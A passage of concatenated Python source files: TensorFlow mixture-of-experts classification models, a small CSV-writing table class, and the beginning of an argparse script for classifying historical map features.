vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
class_size = FLAGS.class_size
shape = model_input.get_shape().as_list()[1]
if FLAGS.moe_group:
channels = vocab_size//class_size + 1
vocab_input = model_input
probabilities_by_class = []
for i in range(channels):
if i<channels-1:
sub_vocab_size = class_size
else:
sub_vocab_size = vocab_size - (channels-1)*class_size
gate_activations = slim.fully_connected(
vocab_input,
sub_vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_gates-%s" % i)
expert_activations = slim.fully_connected(
vocab_input,
sub_vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_experts-%s" % i)
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_vocab = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_vocab = tf.reshape(probabilities_by_vocab,
[-1, sub_vocab_size])
if i==0:
probabilities_by_class = probabilities_by_vocab
else:
probabilities_by_class = tf.concat((probabilities_by_class, probabilities_by_vocab),axis=1)
#probabilities_by_features = tf.stop_gradient(probabilities_by_class)
probabilities_by_features = probabilities_by_class
class_input_1 = slim.fully_connected(
probabilities_by_features,
class_size,
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class1-%s" % i)
class_input_2 = slim.fully_connected(
1-probabilities_by_features,
class_size,
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class2-%s" % i)
if not FLAGS.frame_features:
class_input_1 = tf.nn.l2_normalize(class_input_1,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
class_input_2 = tf.nn.l2_normalize(class_input_2,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
vocab_input = tf.concat((model_input,class_input_1,class_input_2),axis=1)
"""
class_input_1 = slim.fully_connected(
probabilities_by_features,
class_size,
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class1-%s" % i)
if not FLAGS.frame_features:
class_input_1 = tf.nn.l2_normalize(class_input_1,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
vocab_input = tf.concat((model_input,class_input_1),axis=1)"""
else:
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class = tf.reshape(probabilities_by_class,
[-1, vocab_size])
probabilities_by_vocab = probabilities_by_class
vocab_input = model_input
for i in range(FLAGS.moe_layers):
class_input_1 = slim.fully_connected(
probabilities_by_vocab,
class_size,
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs1-%s" % i)
class_input_2 = slim.fully_connected(
1-probabilities_by_vocab,
class_size,
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs2-%s" % i)
if not FLAGS.frame_features:
class_input_1 = tf.nn.l2_normalize(class_input_1,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
class_input_2 = tf.nn.l2_normalize(class_input_2,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
vocab_input = tf.concat((vocab_input,class_input_1,class_input_2),axis=1)
gate_activations = slim.fully_connected(
vocab_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates-%s" % i)
expert_activations = slim.fully_connected(
vocab_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts-%s" % i)
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_vocab = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_vocab = tf.reshape(probabilities_by_vocab,
[-1, vocab_size])
if i<FLAGS.moe_layers-1:
probabilities_by_class = tf.concat((probabilities_by_class,probabilities_by_vocab),axis=1)
final_probabilities = probabilities_by_vocab
return {"predictions": final_probabilities, "predictions_class": probabilities_by_class}
class MoeNoiseModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
class_size = FLAGS.class_size
shape = model_input.get_shape().as_list()[1]
if FLAGS.train=="train":
noise = tf.random_normal(shape=tf.shape(model_input), mean=0.0, stddev=FLAGS.noise_std, dtype=tf.float32)
model_input = tf.nn.l2_normalize(model_input+noise, 1)
if FLAGS.moe_group:
channels = vocab_size//class_size + 1
vocab_input = model_input
probabilities_by_class = []
for i in range(channels):
if i<channels-1:
sub_vocab_size = class_size
else:
sub_vocab_size = vocab_size - (channels-1)*class_size
gate_activations = slim.fully_connected(
vocab_input,
sub_vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_gates-%s" % i)
expert_activations = slim.fully_connected(
vocab_input,
sub_vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_experts-%s" % i)
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_vocab = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_vocab = tf.reshape(probabilities_by_vocab,
[-1, sub_vocab_size])
if i==0:
probabilities_by_class = probabilities_by_vocab
else:
probabilities_by_class = tf.concat((probabilities_by_class, probabilities_by_vocab),axis=1)
#probabilities_by_features = tf.stop_gradient(probabilities_by_class)
probabilities_by_features = probabilities_by_class
class_input = slim.fully_connected(
probabilities_by_features,
class_size,
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class-%s" % i)
class_input = tf.nn.l2_normalize(class_input,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
vocab_input = tf.concat((model_input,class_input),axis=1)
else:
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class = tf.reshape(probabilities_by_class,
[-1, vocab_size])
probabilities_by_vocab = probabilities_by_class
vocab_input = model_input
for i in range(FLAGS.moe_layers):
class_input = slim.fully_connected(
probabilities_by_vocab,
class_size,
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs-%s" % i)
if FLAGS.train=="train":
noise = tf.random_normal(shape=tf.shape(class_input), mean=0.0, stddev=0.2, dtype=tf.float32)
class_input = tf.nn.l2_normalize(class_input+noise, 1)
class_input = tf.nn.l2_normalize(class_input,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
vocab_input = tf.concat((vocab_input,class_input),axis=1)
gate_activations = slim.fully_connected(
vocab_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates-%s" % i)
expert_activations = slim.fully_connected(
vocab_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts-%s" % i)
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_vocab = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_vocab = tf.reshape(probabilities_by_vocab,
[-1, vocab_size])
if i<FLAGS.moe_layers-1:
probabilities_by_class = tf.concat((probabilities_by_class,probabilities_by_vocab),axis=1)
final_probabilities = probabilities_by_vocab
return {"predictions": final_probabilities, "predictions_class": probabilities_by_class}
class MoeMix5Model(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
class_size = FLAGS.class_size
shape = model_input.get_shape().as_list()[1]
feature_sizes = FLAGS.feature_sizes
feature_sizes = [int(feature_size) for feature_size in feature_sizes.split(',')]
feature_input = model_input[:,0:feature_sizes[0]]
probabilities_by_class = model_input[:,feature_sizes[0]:]
class_input = slim.fully_connected(
probabilities_by_class,
class_size,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
class_input = tf.nn.l2_normalize(class_input,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
vocab_input = tf.concat((feature_input,class_input),axis=1)
gate_activations = slim.fully_connected(
vocab_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
vocab_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_vocab = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_vocab = tf.reshape(probabilities_by_vocab,
[-1, vocab_size])
final_probabilities = probabilities_by_vocab
return {"predictions": final_probabilities}
class MoeExtendModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
num_extends = FLAGS.moe_num_extend
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
final_probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
final_probabilities = tf.reduce_max(tf.reshape(final_probabilities_by_class_and_batch,
[-1, num_extends, vocab_size]), axis=1)
return {"predictions": final_probabilities}
class MoeExtendDistillChainModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
distill_labels=None,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
num_extends = FLAGS.moe_num_extend
class_size = 256
if distill_labels is not None:
class_input = slim.fully_connected(
distill_labels,
class_size,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
class_input = tf.reshape(tf.tile(tf.reshape(class_input,[-1,1,class_size]),[1,num_extends,1]),[-1,class_size])
model_input = tf.concat((model_input,class_input),axis=1)
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
final_probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
final_probabilities = tf.reduce_max(tf.reshape(final_probabilities_by_class_and_batch,
[-1, num_extends, vocab_size]), axis=1)
return {"predictions": final_probabilities}
class MoeExtendCombineModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
class_size = FLAGS.class_size
num_extends = FLAGS.moe_num_extend
shape = model_input.get_shape().as_list()[1]
model_input = tf.reshape(model_input,[-1, num_extends, shape])
model_input_0 = model_input[:,0,:]
gate_activations = slim.fully_connected(
model_input_0,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input_0,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class = tf.reshape(probabilities_by_class,
[-1, vocab_size])
probabilities_by_vocab = probabilities_by_class
input_layers = []
for i in range(FLAGS.moe_layers-1):
model_input_i = model_input[:,i+1,:]
class_input_1 = slim.fully_connected(
probabilities_by_vocab,
class_size,
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs1-%s" % i)
class_input_1 = tf.nn.l2_normalize(class_input_1,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
input_layers.append(class_input_1)
vocab_input = tf.concat([model_input_i]+input_layers,axis=1)
gate_activations = slim.fully_connected(
vocab_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates-%s" % i)
expert_activations = slim.fully_connected(
vocab_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts-%s" % i)
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_vocab = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_vocab = tf.reshape(probabilities_by_vocab,
[-1, vocab_size])
probabilities_by_class = tf.concat((probabilities_by_class,probabilities_by_vocab),axis=1)
final_probabilities = probabilities_by_vocab
return {"predictions": final_probabilities, "predictions_class": probabilities_by_class}
class MoeExtendSoftmaxModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
num_extends = FLAGS.moe_num_extend
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
extend_activations = slim.fully_connected(
model_input,
vocab_size,
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="extends")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
extend_distribution = tf.nn.softmax(tf.reshape(
extend_activations,
[-1, num_extends, vocab_size]),dim=1) # (Batch * #Labels) x (num_mixtures + 1)
final_probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
final_probabilities = tf.reduce_sum(tf.reshape(final_probabilities_by_class_and_batch,
[-1, num_extends, vocab_size])*extend_distribution,axis=1)
return {"predictions": final_probabilities}
class MoeSepModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
feature_sizes = FLAGS.feature_sizes
feature_sizes = [int(feature_size) for feature_size in feature_sizes.split(',')]
fbegin = 0
final_probabilities_all = []
for i in range(len(feature_sizes)):
feature_size = feature_sizes[i]
feature_input = model_input[:,fbegin:fbegin+feature_size]
fbegin += feature_size
gate = slim.fully_connected(
feature_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates-%s" % i)
expert = slim.fully_connected(
feature_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts-%s" % i)
gating_distribution = tf.nn.softmax(tf.reshape(
gate,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
final_prob = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
final_prob = tf.reshape(final_prob,[-1, vocab_size])
final_probabilities_all.append(final_prob)
final_probabilities_all = tf.stack(final_probabilities_all,axis=1)
final_probabilities = tf.reduce_max(final_probabilities_all,axis=1)
return {"predictions": final_probabilities}
class SimModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
embedding_size = model_input.get_shape().as_list()[1]
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
model_input = tf.maximum(model_input,tf.zeros_like(model_input))
expert_distribution = []
for i in range(num_mixtures):
embeddings = tf.Variable(tf.truncated_normal([vocab_size, embedding_size],stddev=0.1))
tf.add_to_collection(name=tf.GraphKeys.REGULARIZATION_LOSSES, value=l2_penalty*tf.nn.l2_loss(embeddings))
embeddings = tf.maximum(embeddings,tf.zeros_like(embeddings))
norm_embeddings = tf.sqrt(tf.reduce_sum(tf.square(embeddings), 1, keep_dims=True))
normalized_embeddings = tf.div(embeddings, norm_embeddings)
norm_input = tf.sqrt(tf.reduce_sum(tf.square(model_input), 1, keep_dims=True))
normalized_input = tf.div(model_input,norm_input)
similarity = tf.matmul(normalized_input, normalized_embeddings, transpose_b=True)*2
expert_distribution.append(similarity)
expert_distribution = tf.stack(expert_distribution,axis=2)
expert_distribution = tf.reshape(expert_distribution,[-1,num_mixtures])
probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class_and_batch = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size])
final_probabilities = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size])
return {"predictions": final_probabilities}
class AutoEncoderModel(models.BaseModel):
"""Logistic model with L2 regularization."""
def create_model(self, model_input, vocab_size, l2_penalty=1e-8, **unused_params):
"""Creates a logistic model.
Args:
model_input: 'batch' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes."""
model_input = model_input
hidden_size_1 = FLAGS.hidden_size_1
hidden_size_2 = FLAGS.encoder_size
with tf.name_scope("autoencoder"):
hidden_1 = slim.fully_connected(
model_input,
hidden_size_1,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="hidden_1")
hidden_2 = slim.fully_connected(
hidden_1,
hidden_size_2,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="hidden_2")
output_1 = slim.fully_connected(
hidden_2,
hidden_size_1,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="output_1")
output_2 = slim.fully_connected(
output_1,
vocab_size,
activation_fn=tf.nn.sigmoid,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="output_2")
"""
scale = tf.get_variable("scale", [1, vocab_size], tf.float32,
initializer=tf.constant_initializer(0.0))
tf.add_to_collection(name=tf.GraphKeys.REGULARIZATION_LOSSES, value=l2_penalty*tf.nn.l2_loss(scale))"""
output_2 = model_input
return {"predictions": output_2}
|
nilq/baby-python
|
python
|
from table import Table
class CSVTable(Table):
def __init__(self, savepath):
self.savepath = savepath
self.file_created = False
super().__init__()
def _table_add(self):
fieldnames = [column.generate_header() for column in self.columns]
with open(self.savepath, mode="w") as csv_file:
writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
writer.writeheader()
def _tablesave(self):
fieldnames = [column.generate_header() for column in self.columns]
values = {column.generate_header(): column.get_last_value() for column in self.columns}
with open(self.savepath, mode="a") as csv_file:
writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
writer.writerow(values)
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
import csv
from pathlib import Path
import tkinter as tk
import argparse
import json
def matchKeyToName(pathToJsonfile:str, key : str):
cityKeysFile = json.load(open(pathToJsonfile))
return cityKeysFile[key]['Town']
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--classifType', type=str, required=False, default='Tiles')
parser.add_argument('--datasetPath', type=str, required=False, default='C:/Users/hx21262/MAPHIS/datasets')
parser.add_argument('--cityKey', type=str, required=False, default='36')
args = parser.parse_args()
cityName = matchKeyToName(f'{args.datasetPath}/cityKey.json', args.cityKey)
datasetPath = Path(args.datasetPath)
classifiedFolderPath = Path(f'{args.datasetPath}/classifiedMaps/{cityName}')
classifiedFolderPath.mkdir(parents=True, exist_ok=True)
print(f'Classification Type : {args.classifType}')
if args.classifType.lower() == 'labels':
defaultFeatureList = ['manhole','lamppost', 'stone', 'chimney', 'chy', 'hotel',
'church', 'workshop', 'firepost', 'river', 'school', 'barrack',
'workhouse', 'market', 'chapel', 'bank', 'pub', 'public house', 'hotel',
'inn', 'bath', 'theatre', 'police', 'wharf', 'yard', 'green', 'park', 'quarry' ]
